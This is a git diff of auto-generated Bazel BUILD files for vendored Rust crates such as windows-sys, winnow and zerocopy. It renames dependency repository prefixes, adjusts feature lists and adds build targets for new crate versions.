diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel index 2addd7c9aa43..744659daedf9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.48.0.bazel @@ -40,7 +40,6 @@ rust_library( "Win32_System_IO", "Win32_System_Pipes", "Win32_System_Threading", - "Win32_System_WindowsProgramming", "default", ], crate_root = "src/lib.rs", @@ -96,6 +95,6 @@ rust_library( }), version = "0.48.0", deps = [ - "@vendor__windows-targets-0.48.5//:windows_targets", + "@vendor_ts__windows-targets-0.48.5//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel index 8d2ee2174e1b..ab36b4cfa4e0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.52.0.bazel @@ -28,14 +28,6 @@ rust_library( "WORKSPACE.bazel", ], ), - crate_features = [ - "Win32", - "Win32_Foundation", - "Win32_System", - "Win32_System_ProcessStatus", - "Win32_System_Threading", - "default", - ], crate_root = "src/lib.rs", edition = "2021", rustc_flags = [ @@ -89,6 +81,6 @@ rust_library( }), version = "0.52.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel index 3edea90968f3..9b2c722558cc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-sys-0.59.0.bazel 
@@ -31,12 +31,17 @@ rust_library( crate_features = [ "Win32", "Win32_Foundation", + "Win32_Security", "Win32_Storage", "Win32_Storage_FileSystem", "Win32_System", "Win32_System_Com", "Win32_System_Console", + "Win32_System_IO", + "Win32_System_ProcessStatus", "Win32_System_SystemInformation", + "Win32_System_Threading", + "Win32_System_WindowsProgramming", "Win32_UI", "Win32_UI_Shell", "default", @@ -94,6 +99,6 @@ rust_library( }), version = "0.59.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel index 8d59fbf6b521..f235fb732a5a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.48.5.bazel 
@@ -82,22 +82,22 @@ rust_library( version = "0.48.5", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows_aarch64_msvc-0.48.5//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_aarch64_msvc-0.48.5//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows_i686_msvc-0.48.5//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_msvc-0.48.5//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__windows_i686_gnu-0.48.5//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_gnu-0.48.5//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows_x86_64_msvc-0.48.5//:windows_x86_64_msvc", # cfg(all(target_arch = "x86_64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_msvc-0.48.5//:windows_x86_64_msvc", # cfg(all(target_arch = "x86_64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", 
not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.48.5//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel index 854e7e0b060a..c979bc50d9d1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-targets-0.52.6.bazel 
@@ -82,22 +82,22 @@ rust_library( version = "0.52.6", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows_aarch64_msvc-0.52.6//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_aarch64_msvc-0.52.6//:windows_aarch64_msvc", # cfg(all(target_arch = "aarch64", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows_i686_msvc-0.52.6//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_i686_msvc-0.52.6//:windows_i686_msvc", # cfg(all(target_arch = "x86", target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__windows_i686_gnu-0.52.6//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_i686_gnu-0.52.6//:windows_i686_gnu", # cfg(all(target_arch = "x86", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows_x86_64_msvc-0.52.6//:windows_x86_64_msvc", # cfg(all(any(target_arch = "x86_64", target_arch = "arm64ec"), target_env = "msvc", not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_msvc-0.52.6//:windows_x86_64_msvc", # cfg(all(any(target_arch = "x86_64", target_arch = "arm64ec"), target_env = "msvc", not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - 
"@vendor__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) + "@vendor_ts__windows_x86_64_gnu-0.52.6//:windows_x86_64_gnu", # cfg(all(target_arch = "x86_64", target_env = "gnu", not(target_abi = "llvm"), not(windows_raw_dylib))) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel index d43430783ad6..362ee5153396 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_aarch64_gnullvm-0.48.5//:build_script_build", + "@vendor_ts__windows_aarch64_gnullvm-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel index 28d57204eab3..d4a56f926807 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_aarch64_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_aarch64_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel index 8b9d61a37fcc..7b60315c4658 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_aarch64_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_aarch64_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel index 4ea07829b8e5..7aaf3e56924b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_aarch64_msvc-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_aarch64_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_aarch64_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel index 1f1ccff3723e..45cf7592d1a8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_i686_gnu-0.48.5//:build_script_build", + "@vendor_ts__windows_i686_gnu-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel index e97f0d525e95..c31f565b76c6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnu-0.52.6.bazel 
@@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_gnu-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_gnu-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel index abd74fe822ee..7f37dcce3068 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel index 6a1d284815b4..98eef82ece69 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_i686_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_i686_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel index 557e0069dbce..d09383b28359 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_i686_msvc-0.52.6.bazel 
@@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_i686_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_i686_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel index 993ddafbaf99..14508675b586 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_x86_64_gnu-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_gnu-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel index 665a23a53619..eb1219c681ce 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnu-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_gnu-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_gnu-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel index 703625bfdca9..71285899742a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.48.5.bazel 
@@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_x86_64_gnullvm-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_gnullvm-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel index d4a3464e1176..678e71b4da5f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_gnullvm-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_gnullvm-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_gnullvm-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel index bcc41e3bef94..9d9664ccbd46 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.48.5.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.48.5", deps = [ - "@vendor__windows_x86_64_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel index 5c2d37dbca84..df8d9024f53c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel 
@@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel index e5cef505d453..4c327dadb1db 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel @@ -84,5 +84,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.6.24", + version = "0.7.3", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel new file mode 100644 index 000000000000..01f119aef6f8 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel 
@@ -0,0 +1,142 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "wit_bindgen_rt", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wit-bindgen-rt", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + 
"@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.33.0", + deps = [ + "@vendor_ts__wit-bindgen-rt-0.33.0//:build_script_build", + ], +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + pkg_name = "wit-bindgen-rt", + 
rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wit-bindgen-rt", + "manual", + "noclippy", + "norustfmt", + ], + version = "0.33.0", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel index ac2c3dbf2572..04a723e7bd5c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel @@ -38,7 +38,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__zerocopy-derive-0.7.35//:zerocopy_derive", + "@vendor_ts__zerocopy-derive-0.7.35//:zerocopy_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -91,6 +91,6 @@ rust_library( }), version = "0.7.35", deps = [ - "@vendor__byteorder-1.5.0//:byteorder", + "@vendor_ts__byteorder-1.5.0//:byteorder", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel new file mode 100644 index 000000000000..2e234c58a3be --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel 
@@ -0,0 +1,148 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "zerocopy", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "simd", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], 
+ "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.8.20", + deps = [ + "@vendor_ts__zerocopy-0.8.20//:build_script_build", + ], +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "simd", + ], + 